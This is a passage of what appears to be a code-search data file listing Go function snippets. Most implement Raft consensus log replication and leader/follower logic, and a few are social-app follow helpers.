%d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func (s *raftServer) handleAppendEntry(from int, ae *AppendEntry) bool {\n\tacc := false\n\ts.writeToLog(\"Received appendEntry message from \" + strconv.Itoa(from) + \" with term #\" + strconv.Itoa(ae.Term))\n\tif ae.Term >= s.Term() { // AppendEntry with same or larger term\n\t\ts.setTerm(ae.Term)\n\t\ts.setState(FOLLOWER)\n\t\tacc = true\n\t}\n\ts.replyTo(from, &EntryReply{Term: s.Term(), Success: acc})\n\treturn acc\n}", "func (a *RPC) AppendRPC(args *AppendRPCArgs, reply *AppendRPCReply) error {\n\t//raft.ElectionTimer_ch <- args.LeaderId //TODO\n\tr.ResetTimer() // Reset timer for election \n\tmutex.Lock() \t \n\tr.ResetTimer()\n var logIndex int \n if len(r.Log) > 0 { // If Log is not emtpy.. Initialised Log intex to last heighest log index\n \tlogIndex =len(r.Log)-1\n }else{ \n \tlogIndex =0 // Else Log index is 0\n }\n //fmt.Println(\"LogInedx \",logIndex,\" PrevLogIndex \",args.PrevLogIndex)\n\tif len(args.Entry.Command)!=0{ // If This request has actual logentry to append, else it is heartbeat. \n\t\t\n\t\tr.IsLeader=2 \t\t\t\t // Fall back to Follower state \n\t\tr.LeaderId=args.LeaderId\t // Update to current Leader id \n\t\tr.VotedFor=-1 \t\t\t // Election is over, No need to remember whome u voted for. \n\t\t\t\t\t\t\t\t\t// Thank god... Leader will keep remembering you periodaically :)\n \n\t\t \t if(args.Term < r.CurrentTerm) { // If this logentry has came from Previous Term.. Just Reject it. \n\t\t \treply.Reply=false\n\t\t } else if (logIndex <args.PrevLogIndex) { // log lagging behind, \n\t\t \treply.Reply=false // Set appened to false and \n\t\t reply.NextIndex=logIndex+1 // Set next expected log entry to Heighet log Index +1\n\t\t reply.MatchIndex=-1 \n\t\t r.CurrentTerm=args.Term\t\n\t\t } else if (logIndex > args.PrevLogIndex){ // log is ahead \n\t\t \t if (r.Log[args.PrevLogIndex].Term != args.PrevLogTerm) { // If previous log term does matches with leaders Previous log term \n\t\t \t \t\t\treply.Reply=false \n\t\t reply.NextIndex=args.PrevLogIndex // Set expected next log index to previous to do check matching\n\t\t \treply.MatchIndex = -1\n\t\t \tr.CurrentTerm=args.Term\t\n\t\t } else{ \t\t\t\t\t\t\t\t\t\t// Else Terms is matching, overwrite with log with new entry\n\t\t \t\tr.Log[args.PrevLogIndex+1]=args.Entry \n\t\t\t\t\t\t\treply.Reply=true\n\t\t \treply.MatchIndex=args.PrevLogIndex+1 // Match Index is set to added entry \n\t\t \treply.NextIndex=args.PrevLogIndex+2 // Expected Entry is next log entry after added entry\n\t\t \tr.CurrentTerm=args.Term\t\n\t\t \t//fmt.Println(\"Calling commit in logIndex>PrevLogIndex\")\n\t\t \tCommitCh <- CommitI_LogI{args.LeaderCommit,args.PrevLogIndex+1} // Send Commit index to commitCh to commit log entries, Commit only till newly added aentry\n\t\t }\n\t\t }else if(logIndex == args.PrevLogIndex) { // log is at same space\n\t\t \tif logIndex!=0 && (r.Log[logIndex].Term != args.PrevLogTerm) { // if log is not emtpy, and previous log tersm is matching\n\t\t reply.Reply=false \t\t\t\t\t\t\t\t\t// Reject the log entry \n\t\t reply.NextIndex=args.PrevLogIndex \n\t\t reply.MatchIndex = -1\n\t\t r.CurrentTerm=args.Term\t\n\t\t } else if len(r.Log)==0 && args.Entry.SequenceNumber==0{ // If log is empty and Recieved log entry index is 0, Add Entry\n\t\t \t\t\tr.Log=append(r.Log,args.Entry) \t\n\t\t \t\treply.Reply=true\n\t\t \t\treply.NextIndex=len(r.Log) \t\t\t\t\n\t\t \t\treply.MatchIndex=len(r.Log)-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\tCommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }else if len(r.Log)!=args.Entry.SequenceNumber{ // If log is empty and Recieved log entry index is not 0, Missmatch, Reject\n\t\t \t\t \t//r.Log=append(r.Log,args.Entry)\n\t\t \t\treply.Reply=false\n\t\t \t\treply.NextIndex=len(r.Log)\n\t\t \t\treply.MatchIndex=-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\t//CommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }else {\t\t\t\t\t\t\t\t\t\t\t// Previous log is matched , and this is new entry, add it to last of log\n\t\t \t\t\tr.Log=append(r.Log,args.Entry)\n\t\t \t\treply.Reply=true\n\t\t \t\treply.NextIndex=len(r.Log)\n\t\t \t\treply.MatchIndex=len(r.Log)-1\n\t\t \t\tr.CurrentTerm=args.Term\t\n\t\t \t\t//fmt.Println(\"Calling commit in logIndex=PrevLogIndex\")\n\t\t \t\tCommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }\n\t\t }\n\t\t /* if len (args.Entry.Command)!=0{\n\t\t\t\tfmt.Println(\"Received append rpc for\",r.Id ,\" From \",args.LeaderId, \" Log size is \",logIndex, \" == \",args.PrevLogIndex,\" < \", args.Entry.SequenceNumber ,\" Commitindex \",r.CommitIndex,\" < \",args.LeaderCommit, \"added \",reply.Reply)\n\t\t\t}*/\n\tr.ResetTimer() // This is For precautionaru measure, as system was slow and it was taking more time, leading to expiry of timer\n\t\t\t\t\t// Before replying \t\n\t}else\n\t{\n\t\t/*\n\t\tThis part is same as above but only without actually aadding entries to log. Next index and match index is updated.\n\t\tand CommitCh is feed with commit Index entries\n\t\t*/\n\t\t//fmt.Println(\"Heart Beat recieved \",r.Id,\" \",\"LogInedx \" , len(r.Log)-1,\" PrevLogIndex \",args.PrevLogIndex)\n\t\t//fmt.Println(\"LogInedx \",logIndex,\" PrevLogIndex \",args.PrevLogIndex)\n\t\t if(r.CurrentTerm <= args.Term) { \n\t\t\t\tr.IsLeader=2\n\t\t\t\tr.LeaderId=args.LeaderId\t\n\t\t\t\tr.VotedFor=-1\n\t\t\t\tr.CurrentTerm=args.Term\t\n\t\t\t\tif(logIndex == args.PrevLogIndex && len(r.Log)==0){\n\t\t\t\t\treply.NextIndex=0\n\t\t\t\t\treply.MatchIndex=-1\n\t\t\t\t\t//fmt.Println(\"HeartBeat Recieved logIndex == args.PrevLogIndex && len(r.Log)==0\") \n\t\t\t\t}else if (logIndex <args.PrevLogIndex){\n\t\t\t\t\treply.NextIndex=logIndex+1\n\t\t\t\t\treply.MatchIndex=-1\n\t\t\t\t\t//fmt.Println(\"HeartBeat Recieved logIndex <args.PrevLogIndex\") \n\t\t\t\t}else if (logIndex >args.PrevLogIndex){\n\t\t\t\t\tif (r.Log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\t\t\t\t\treply.Reply=false \n\t\t reply.NextIndex=-1\n\t\t reply.MatchIndex = -1\n\t\t\t\t\t}else{\n\t\t\t\t\t\treply.Reply=true\n\t\t reply.MatchIndex=args.PrevLogIndex\n\t\t reply.NextIndex=args.PrevLogIndex+1\n\t\t CommitCh <- CommitI_LogI{args.LeaderCommit,args.PrevLogIndex+1}\n\t\t\t\t\t}\n\t\t\t\t}else if(logIndex == args.PrevLogIndex) {\n\t\t\t\t\t\tif logIndex!=0 && (r.Log[logIndex].Term != args.PrevLogTerm) {\n\t\t\t\t\t\t\t reply.Reply=false\n\t\t reply.NextIndex=-1\n\t\t reply.MatchIndex = -1\n\n\t\t }else{\n\t\t \treply.Reply=true\n\t\t reply.NextIndex=args.PrevLogIndex+1\n\t\t reply.MatchIndex=args.PrevLogIndex\n\t\t CommitCh <- CommitI_LogI{args.LeaderCommit,len(r.Log)-1}\n\t\t }\n\t\t\t\t\t}\n\t\t\t}\n\tr.ResetTimer()\n\t}\n mutex.Unlock()\n\treturn nil\n}", "func Notification_OnFollowed(UserId, FollowedPeerUserId, FLId int) {\n\tif UserId == FollowedPeerUserId { //must never reach here at all\n\t\treturn\n\t}\n\n\tref := Ref_FollowAdd(FLId)\n\tnf := x.Notification{\n\t\tId: 0,\n\t\tForUserId: FollowedPeerUserId,\n\t\tActorUserId: UserId,\n\t\tActionTypeId: ACTION_TYPE_FOLLOWED_USER,\n\t\tObjectTypeId: OBJECT_FOLLOWING,\n\t\tRowId: FLId,\n\t\tRootId: FollowedPeerUserId,\n\t\tRefId: ref,\n\t\tSeenStatus: 0,\n\t\tCreatedTime: helper.TimeNow(),\n\t}\n\n\tnf.Save(base.DB)\n\n\tNotification_PushToUserPipe(nf)\n}", "func (r *Raft) sendAppendEntriesRPC() {\n\tappEntriesObj := r.prepAppendEntriesReq() //prepare AppendEntries object\n\n\tappEntriesObjSlice := make([]interface{}, len(appEntriesObj))\n\t//fmt.Println(\"Prep AE_RPC is:\", appEntriesObj)\n\t//Copy to new slice created--This is the method to send a []interface to []TypeX\n\tfor i, d := range appEntriesObj {\n\t\tappEntriesObjSlice[i] = d\n\t}\n\tr.sendToAll_AppendReq(appEntriesObjSlice) //send AppendEntries to all the followers\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n lastLogIndex := 0\n isLeader := true\n \n // TODO WED: check corner cases with -1\n rf.mu.Lock()\n term := rf.currentTerm\n myId := rf.me\n if len(rf.log) > 0 {\n lastLogIndex = len(rf.log)\n //term = rf.log[index].Term \n }\n \n if rf.state != Leader || rf.killed() {\n return lastLogIndex-1, term, false\n }\n \n var oneEntry LogEntry\n oneEntry.Command = command\n oneEntry.Term = term\n \n rf.log = append(rf.log, oneEntry)\n rf.mu.Unlock()\n\n \n go func() {\n \n // Add a while loop. when successReply count greater than threhsold, commit. loop breaks when successReply is equal to peers\n // the for loop inside only iterates over the left peers.\n \n var localMu sync.Mutex\n \n isLeader := true\n committed := false\n successReplyCount := 0\n var receivedResponse []int\n receivedResponse = append(receivedResponse, myId)\n\n for isLeader {\n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: Terminated. Closing all outstanding Append Entries calls to followers.\",myId, term)\n return \n }\n\n var args = AppendEntriesArgs {\n LeaderId: myId,\n }\n rf.mu.Lock()\n numPeers := len(rf.peers)\n rf.mu.Unlock()\n\n for id := 0; id < numPeers && isLeader; id++ {\n if (!find(receivedResponse,id)) {\n if lastLogIndex < rf.nextIndex[id] {\n successReplyCount++\n receivedResponse = append(receivedResponse,id)\n continue\n }\n var logEntries []LogEntry\n logEntries = append(logEntries,rf.log[(rf.nextIndex[id]):]...)\n args.LogEntries = logEntries\n args.PrevLogTerm = rf.log[rf.nextIndex[id]-1].Term\n args.PrevLogIndex = rf.nextIndex[id]-1\n args.LeaderTerm = rf.currentTerm\n args.LeaderCommitIndex = rf.commitIndex\n \n go func(serverId int) {\n var reply AppendEntriesReply\n ok:=rf.sendAppendEntries(serverId, &args, &reply)\n if !rf.CheckTerm(reply.CurrentTerm) {\n localMu.Lock()\n isLeader=false\n localMu.Unlock()\n } else if reply.Success && ok {\n localMu.Lock()\n successReplyCount++\n receivedResponse = append(receivedResponse,serverId)\n localMu.Unlock()\n rf.mu.Lock()\n if lastLogIndex >= rf.nextIndex[id] {\n rf.matchIndex[id]= lastLogIndex\n rf.nextIndex[id] = lastLogIndex + 1\n }\n rf.mu.Unlock()\n } else {\n rf.mu.Lock()\n rf.nextIndex[id]-- \n rf.mu.Unlock()\n }\n } (id)\n }\n }\n \n fmt.Printf(\"\\nsleeping before counting success replies\\n\")\n time.Sleep(time.Duration(RANDOM_TIMER_MIN*time.Millisecond))\n\n if !committed && isLeader {\n votesForIndex := 0\n N := math.MaxInt32\n rf.mu.Lock()\n for i := 0; i < numPeers; i++ {\n if rf.matchIndex[i] > rf.commitIndex {\n if rf.matchIndex[i] < N {\n N = rf.matchIndex[i]\n }\n votesForIndex++\n }\n }\n rf.mu.Unlock()\n\n\n if (votesForIndex > (numPeers/2)){ \n go func(){\n committed = true\n rf.mu.Lock()\n rf.commitIndex = N // Discuss: 3. should we use lock?\n rf.log[N].Term = rf.currentTerm\n if rf.commitIndex >= lastLogIndex {\n var oneApplyMsg ApplyMsg\n oneApplyMsg.CommandValid = true\n oneApplyMsg.CommandIndex = lastLogIndex\n oneApplyMsg.Command = command\n go func() {rf.applyCh <- oneApplyMsg} ()\n }\n rf.mu.Unlock()\n }()\n }\n } else if successReplyCount == numPeers {\n return\n } \n }\n } ()\n \n // Your code here (2B code).\n return lastLogIndex, term, isLeader\n}", "func (r *Raft) sendAppend(to uint64) bool {\n\tprevIndex := r.Prs[to].Next - 1\n\tprevLogTerm, err := r.RaftLog.Term(prevIndex)\n\tif err != nil {\n\t\tif err == ErrCompacted {\n\t\t\tr.sendSnapshot(to)\n\t\t\treturn false\n\t\t}\n\t\tpanic(err)\n\t}\n\tvar entries []*pb.Entry\n\tn := len(r.RaftLog.entries)\n\tfor i := r.RaftLog.toSliceIndex(prevIndex + 1); i < n; i++ {\n\t\tentries = append(entries, &r.RaftLog.entries[i])\n\t}\n\tmsg := pb.Message{\n\t\tMsgType: pb.MessageType_MsgAppend,\n\t\tFrom: r.id,\n\t\tTo: to,\n\t\tTerm: r.Term,\n\t\tCommit: r.RaftLog.committed,\n\t\tLogTerm: prevLogTerm,\n\t\tIndex: prevIndex,\n\t\tEntries: entries,\n\t}\n\tr.msgs = append(r.msgs, msg)\n\treturn true\n}", "func (m *Member) AppendEntry(leader string, term uint64, value int64, prevLogID int64) (bool, error) {\n\tlog.Infoln(\"Requesting log entry of\", m.Name, \"Value\", value)\n\tvar conn *grpc.ClientConn\n\tconn, err := grpc.Dial(m.Address(), grpc.WithInsecure())\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\tdefer conn.Close()\n\tapi := raftapi.NewRaftServiceClient(conn)\n\tctx := context.Background()\n\tresponse, err := api.AppendEntry(ctx, &raftapi.AppendEntryRequest{\n\t\tTerm: term,\n\t\tLeader: leader,\n\t\tPrevLogId: prevLogID,\n\t\tPrevLogTerm: term,\n\t\tEntry: &raftapi.LogEntry{\n\t\t\tTerm: term,\n\t\t\tValue: value,\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\n\treturn response.Success, nil\n}", "func (r *Raft) sendAppendEntriesRPC() {\n\tappEntriesObj := r.prepAppendEntriesReq() //prepare AppendEntries object\n\tappEntriesObjSlice := make([]interface{}, len(appEntriesObj))\n\n\t//Copy to new slice created--This is the method to send a []interface to []TypeX\n\tfor i, d := range appEntriesObj {\n\t\tappEntriesObjSlice[i] = d\n\t}\n\tr.sendToAll_AppendReq(appEntriesObjSlice) //send AppendEntries to all the followers\n}", "func (r *Raft) follower(timeout int) int {\n\twaitTime := timeout //start heartbeat timer,timeout func wil place HeartbeatTimeout on channel\n\tHeartBeatTimer := r.StartTimer(HeartbeatTimeout, waitTime) //start the timer to wait for HBs\n\tfor {\n\t\treq := r.receive()\n\t\tswitch req.(type) {\n\t\tcase AppendEntriesReq:\n\t\t\trequest := req.(AppendEntriesReq) //explicit typecasting\n\t\t\tr.serviceAppendEntriesReq(request, HeartBeatTimer, waitTime, follower)\n\t\tcase RequestVote:\n\t\t\trequest := req.(RequestVote)\n\t\t\tr.serviceRequestVote(request, follower)\n\t\tcase ClientAppendReq: //follower can't handle clients and redirects to leader, sends upto CommitCh as well as clientCh\n\t\t\trequest := req.(ClientAppendReq) //explicit typecasting\n\t\t\tresponse := ClientAppendResponse{}\n\t\t\tlogItem := LogItem{r.CurrentLogEntryCnt, false, request.Data} //lsn is count started from 0\n\t\t\tr.CurrentLogEntryCnt += 1\n\t\t\tresponse.LogEntry = logItem\n\t\t\tr.CommitCh <- &response.LogEntry\n\t\tcase int:\n\t\t\tHeartBeatTimer.Stop()\n\t\t\treturn candidate\n\t\t}\n\t}\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (r *Raft) leader() int {\n\tr.setNextIndex_All() //so that new leader sets it map\n\tr.sendAppendEntriesRPC() //send Heartbeats\n\twaitTime := 1 //duration between two heartbeats\n\twaitTime_msecs := msecs * time.Duration(waitTime)\n\tHeartbeatTimer := r.StartTimer(HeartbeatTimeout, waitTime) //starts the timer and places timeout object on the channel\n\twaitStepDown := 7\n\tRetryTimer := r.StartTimer(RetryTimeOut, waitStepDown)\n\tresponseCount := 0\n\ttotalCount := 0\n\tfor {\n\t\treq := r.receive() //wait for client append req,extract the msg received on self EventCh\n\t\tswitch req.(type) {\n\t\tcase ClientAppendReq:\n\t\t\t//reset the heartbeat timer, now this sendRPC will maintain the authority of the leader\n\t\t\tHeartbeatTimer.Reset(waitTime_msecs)\n\t\t\trequest := req.(ClientAppendReq)\n\t\t\tData := request.Data\n\t\t\t//No check for semantics of cmd before appending to log?\n\t\t\tr.AppendToLog_Leader(Data) //append to self log as byte array\n\t\t\tr.sendAppendEntriesRPC()\n\t\t\tresponseCount = 0 //for RetryTimer\n\t\tcase AppendEntriesResponse:\n\t\t\tresponse := req.(AppendEntriesResponse)\n\t\t\tresponseCount += 1\n\t\t\tif responseCount >= majority-1 { //excluding self\n\t\t\t\twaitTime_retry := msecs * time.Duration(waitStepDown)\n\t\t\t\tRetryTimer.Reset(waitTime_retry)\n\t\t\t}\n\t\t\tif !response.IsHeartBeat {\n\t\t\t\tretVal := r.serviceAppendEntriesResp(response, HeartbeatTimer, waitTime)\n\t\t\t\tif retVal == follower {\n\t\t\t\t\treturn follower\n\t\t\t\t}\n\t\t\t}\n\t\tcase AppendEntriesReq: // in case some other leader is also in function, it must fall back or remain leader\n\t\t\trequest := req.(AppendEntriesReq)\n\t\t\tif request.Term > r.myCV.CurrentTerm {\n\t\t\t\tr.myCV.CurrentTerm = request.Term //update self Term and step down\n\t\t\t\tr.myCV.VotedFor = -1 //since Term has increased so VotedFor must be reset to reflect for this Term\n\t\t\t\tr.WriteCVToDisk()\n\t\t\t\treturn follower //sender server is the latest leader, become follower\n\t\t\t} else {\n\t\t\t\t//reject the request sending false\n\t\t\t\treply := AppendEntriesResponse{r.myCV.CurrentTerm, false, r.Myconfig.Id, false, r.MyMetaData.LastLogIndex}\n\t\t\t\tr.send(request.LeaderId, reply)\n\t\t\t}\n\n\t\tcase RequestVote:\n\t\t\trequest := req.(RequestVote)\n\t\t\ttotalCount = responseCount + totalCount + 1 //till responses are coming, network is good to go!\n\t\t\tif totalCount >= majority {\n\t\t\t\twaitTime_retry := msecs * time.Duration(waitStepDown)\n\t\t\t\tRetryTimer.Reset(waitTime_retry)\n\t\t\t}\n\t\t\tr.serviceRequestVote(request, leader)\n\n\t\tcase int: //Time out-time to send Heartbeats!\n\t\t\ttimeout := req.(int)\n\t\t\tif timeout == RetryTimeOut { //that means responses are not being received--means partitioned so become follower\n\t\t\t\tRetryTimer.Stop()\n\t\t\t\treturn follower\n\t\t\t}\n\t\t\tif timeout == HeartbeatTimeout {\n\t\t\t\tHeartbeatTimer.Reset(waitTime_msecs)\n\t\t\t\tresponseCount = 0 //since new heartbeat is now being sent\n\t\t\t\t//it depends on nextIndex which is correctly read in prepAE_Req method,since it was AE other than HB(last entry), it would have already modified the nextIndex map\n\t\t\t\tr.sendAppendEntriesRPC()\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) initRaftNodeToFollower(logCapacity int) {\n rf.mu.Lock()\n defer rf.mu.Unlock()\n\n rf.state = \"Follower\"\n\n rf.currentTerm = 0\n rf.votedFor = -1\n rf.log = make([]Entry, 1, logCapacity)\n rf.log[0].Term = 0\n\n rf.commitIndex = 0\n rf.lastApplied = 0\n\n rf.electionTime = generateElectionTime()\n rf.electionTimer = time.NewTimer(time.Duration(rf.electionTime) * time.Millisecond)\n\n rf.nextIndex = make([]int, len(rf.peers))\n rf.matchIndex = make([]int, len(rf.peers))\n for i:=0; i<len(rf.peers); i++ {\n rf.nextIndex[i] = len(rf.log)\n rf.matchIndex[i] = 0\n }\n\n rf.snapshottedIndex = 0\n}", "func CheckFollowed(dbConn *sql.DB, person_id1, person_id2 int) bool {\n\tquery1 := fmt.Sprintf(\"select id from contacts where user_id = %d and person_id = %d and sharing = true\", person_id1, person_id2)\n\tres1 := db.DataCall(dbConn, query1)\n\tif len(res1) > 0 {\n\t\treturn true\n\t} else {\n\t\treturn false\n\t}\n}", "func (r *Raft) processAppendEntries(done <-chan struct{}) <-chan struct{} {\n\tfinishChannel := make(chan struct{})\n\n\tgo func() {\n\tprocessLoop:\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase appendEntryToProcess, ok := <-r.appendEntriesProcessChannel:\n\t\t\t\tif !ok {\n\t\t\t\t\tr.logger.Debugf(\"channel for processing AppendEntries events was closed.\")\n\t\t\t\t\tbreak processLoop\n\t\t\t\t}\n\n\t\t\t\trequest := appendEntryToProcess.Request\n\t\t\t\tresponseChannel := appendEntryToProcess.ResponseChannel\n\n\t\t\t\tlogger := loggerFromContext(r.logger, appendEntryToProcess.Context)\n\t\t\t\tlogger = logger.WithFields(logrus.Fields{\"RPC\": \"AppendEntries\", \"Sender\": request.GetLeaderId()})\n\n\t\t\t\tlogger.Debugf(\"received RPC: %+v\", request)\n\n\t\t\t\tr.stateMutex.Lock()\n\n\t\t\t\tsenderTerm := request.GetTerm()\n\t\t\t\treceiverTerm := r.stateManager.GetCurrentTerm()\n\t\t\t\tentries := request.GetEntries()\n\t\t\t\tpreviousLogIndex := request.GetPrevLogIndex()\n\t\t\t\tpreviousLogTerm := request.GetPrevLogTerm()\n\t\t\t\tleaderID := request.GetLeaderId()\n\t\t\t\tleaderCommit := request.GetLeaderCommit()\n\t\t\t\trequestedNewLogIndex := previousLogIndex + uint64(len(entries))\n\n\t\t\t\tresponseFunc := func(sentByLeader bool, entriesAppended bool) {\n\t\t\t\t\tr.appendEntriesHandlersChannel <- appendEntriesEvent{\n\t\t\t\t\t\tbyLeader: sentByLeader,\n\t\t\t\t\t}\n\n\t\t\t\t\tresponseChannel <- appendEntriesProcessResponse{\n\t\t\t\t\t\tResponse: &pb.AppendEntriesResponse{\n\t\t\t\t\t\t\tTerm: receiverTerm,\n\t\t\t\t\t\t\tSuccess: entriesAppended,\n\t\t\t\t\t\t},\n\t\t\t\t\t\tError: nil,\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif senderTerm > receiverTerm {\n\t\t\t\t\t// The sender node has higher term than the receiver node, so we switch to FOLLOWER\n\t\t\t\t\tlogger.Debugf(\"switching state to follower. sender's term: %d, receiver's term: %d\", senderTerm, receiverTerm)\n\t\t\t\t\tr.stateManager.SwitchPersistentState(senderTerm, nil, FOLLOWER)\n\t\t\t\t} else if senderTerm < receiverTerm {\n\t\t\t\t\t// The candidate has lower term than the node, so deny the request\n\t\t\t\t\tlogger.Debugf(\"sending reject response. sender's term: %d, receiver's term: %d\", senderTerm, receiverTerm)\n\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\tresponseFunc(false, false)\n\t\t\t\t\tcontinue\n\t\t\t\t} else if r.stateManager.GetRole() == CANDIDATE {\n\t\t\t\t\tlogger.Debugf(\"switching state to follower because received request with an equal term from a leader\")\n\t\t\t\t\tr.stateManager.SwitchPersistentState(senderTerm, nil, FOLLOWER)\n\t\t\t\t}\n\n\t\t\t\t// Set the leader\n\t\t\t\terr := r.cluster.SetLeader(leaderID)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Panicf(\"unable to set leader %s: %+v\", leaderID, err)\n\t\t\t\t}\n\n\t\t\t\t// We check if the index is correct\n\t\t\t\t// index == startingLogIndex - 1 signifies we received first log\n\t\t\t\tif previousLogIndex < startingLogIndex-1 {\n\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\tlogger.Panicf(\"received request with a previous index %d lower than the lower limit for log indexes\",\n\t\t\t\t\t\tpreviousLogIndex)\n\t\t\t\t} else if previousLogIndex >= startingLogIndex {\n\t\t\t\t\t// If log does not contain an term-matching entry at previousLogIndex\n\t\t\t\t\t// reply false\n\t\t\t\t\tterm, err := r.logManager.FindTermAtIndex(previousLogIndex)\n\t\t\t\t\tif err == persister.ErrIndexedLogDoesNotExists {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Debugf(\"unable to find log with index: %+v\", previousLogIndex)\n\t\t\t\t\t\tresponseFunc(true, false)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t} else if err != nil {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"failed when finding log by index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t}\n\n\t\t\t\t\tif term != previousLogTerm {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Debugf(\"terms not equal (local: %d, remote: %d) at index: %d\", term, previousLogTerm, previousLogIndex)\n\t\t\t\t\t\tresponseFunc(true, false)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\n\t\t\t\t\t// If an existing entry conflicts with a new one, i.e. same index\n\t\t\t\t\t// but different terms, delete the existing entry and all that follow it\n\t\t\t\t\t// Otherwise, append only new entries\n\t\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\t\tfirstNewLogIndex := previousLogIndex + 1\n\t\t\t\t\t\tfirstNewLogTerm, err := r.logManager.FindTermAtIndex(firstNewLogIndex)\n\t\t\t\t\t\tif err != nil && err != persister.ErrIndexedLogDoesNotExists {\n\t\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\t\tlogger.Panicf(\"failed when finding log by index %d: %+v\", firstNewLogIndex, err)\n\t\t\t\t\t\t} else if err == nil {\n\t\t\t\t\t\t\tif entries[0].GetTerm() != firstNewLogTerm {\n\t\t\t\t\t\t\t\terr := r.logManager.DeleteLogsAferIndex(firstNewLogIndex)\n\t\t\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\t\t\t\tlogger.Panicf(\"unable to delete log after index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// We presuppose that any logs after the first new log are equal\n\t\t\t\t\t\t\t\tlastLogIndex := r.logManager.GetLastLogIndex()\n\t\t\t\t\t\t\t\tnOfLogToAppend := requestedNewLogIndex - lastLogIndex\n\t\t\t\t\t\t\t\tif requestedNewLogIndex < lastLogIndex {\n\t\t\t\t\t\t\t\t\tnOfLogToAppend = 0\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tindexToAppendFrom := uint64(len(entries)) - nOfLogToAppend\n\t\t\t\t\t\t\t\tentries = entries[indexToAppendFrom:]\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else if len(entries) != 0 {\n\t\t\t\t\t// This is the case when we received first log to append\n\t\t\t\t\t// Therefore we need to delete all logs\n\t\t\t\t\terr := r.logManager.DeleteLogsAferIndex(startingLogIndex)\n\t\t\t\t\tif err != nil && err != persister.ErrDatabaseEmpty {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"unable to delete log after index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tlogger.Debugf(\"appending entries: %+v\", entries)\n\t\t\t\t\terr := r.logManager.AppendEntries(entries)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"unable to append logs: %+v\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// Specs say: If leaderCommit > commitIndex, set commitIndex =\n\t\t\t\t// min(leaderCommit, index of last new entry).\n\t\t\t\t// Because we do not keep track of last applied, therefore\n\t\t\t\t// we set to leaderCommit if localCommitIndex < leaderCommit < indexOfLastNewEntry\n\t\t\t\t// we set to indexOfLastNewEntry if localCommitIndex < indexOfLastNewEntry < leaderCommit\n\t\t\t\t// we leave localCommitIndex if indexOfLastNewEntry < localCommitIndex < leaderCommit\n\t\t\t\tlocalCommitIndex := r.stateManager.GetCommitIndex()\n\t\t\t\tif leaderCommit > localCommitIndex {\n\t\t\t\t\tlogger.Debugf(\"deciding whether to commit: localCommit: %d, newIndex: %d, leaderCommit: %d\", localCommitIndex, requestedNewLogIndex, leaderCommit)\n\n\t\t\t\t\tnewCommitIndex := localCommitIndex\n\t\t\t\t\tif localCommitIndex <= requestedNewLogIndex && requestedNewLogIndex <= leaderCommit {\n\t\t\t\t\t\tnewCommitIndex = requestedNewLogIndex\n\t\t\t\t\t} else if localCommitIndex <= leaderCommit && leaderCommit <= requestedNewLogIndex {\n\t\t\t\t\t\tnewCommitIndex = leaderCommit\n\t\t\t\t\t}\n\n\t\t\t\t\tr.commitLogsToStateMachine(appendEntryToProcess.Context, localCommitIndex, 